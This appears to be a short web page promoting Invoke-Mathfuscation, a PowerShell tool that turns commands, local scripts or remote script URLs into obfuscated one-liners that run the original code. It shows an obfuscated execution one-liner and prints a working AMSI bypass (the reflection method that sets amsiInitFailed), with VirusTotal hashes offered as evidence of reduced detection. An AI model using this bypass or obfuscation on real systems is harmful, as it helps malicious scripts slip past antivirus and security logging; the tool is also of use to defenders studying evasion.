Invoke-Mathfuscation

Invoke-Mathfuscation – GitHub

A quick command line utility that converts individual characters of an input string into char values. It then takes a user-supplied number value and uses it to obfuscate the individual char values. Lastly, it outputs a simple obfuscated one-liner using random polymorphic variables which will execute the original string. Currently supports:

  • Remote URL (ie: http://example.com/dir/remote.ps1)
  • Local File (ie: C:\tmp\local.ps1)
  • PowerShell Command (ie: Write-Host “Hello world!”)
  • Update: Supports positive/negative numbers

When prompted, specify a command to invoke, remote URL or full local path to a .ps1 file, then supply the number offset which will be added or subtracted to the char values. Example:

Write-Host "Hello world!" using 600 as an offset:@(687,714,705,716,701,645,672,711,715,716,632,634,672,701,708,708,711,632,719,711,714,708,700,633,634)|%{$Pbdli=$Pbdli+[char]($_-600)};.(g`cm i?[?x])($Pbdli)

VirusTotal Detections

Example: AMSI Bypass using Using Matt Graebers Reflection method:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)


Unmathfuscated: 3f5dcf5b5cd4eb727ed4cd6cea6bbbaa8c1c5272b60c0415084981ec30e7a66b 

Mathfuscated: 5db31b84c99d9a977e629f09b4e1f7cbd525b1167959457f6b59220e4e2eb9a5 

mathfuscation_virustotal

https://github.com/bobby-tablez/Invoke-Mathfuscation

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *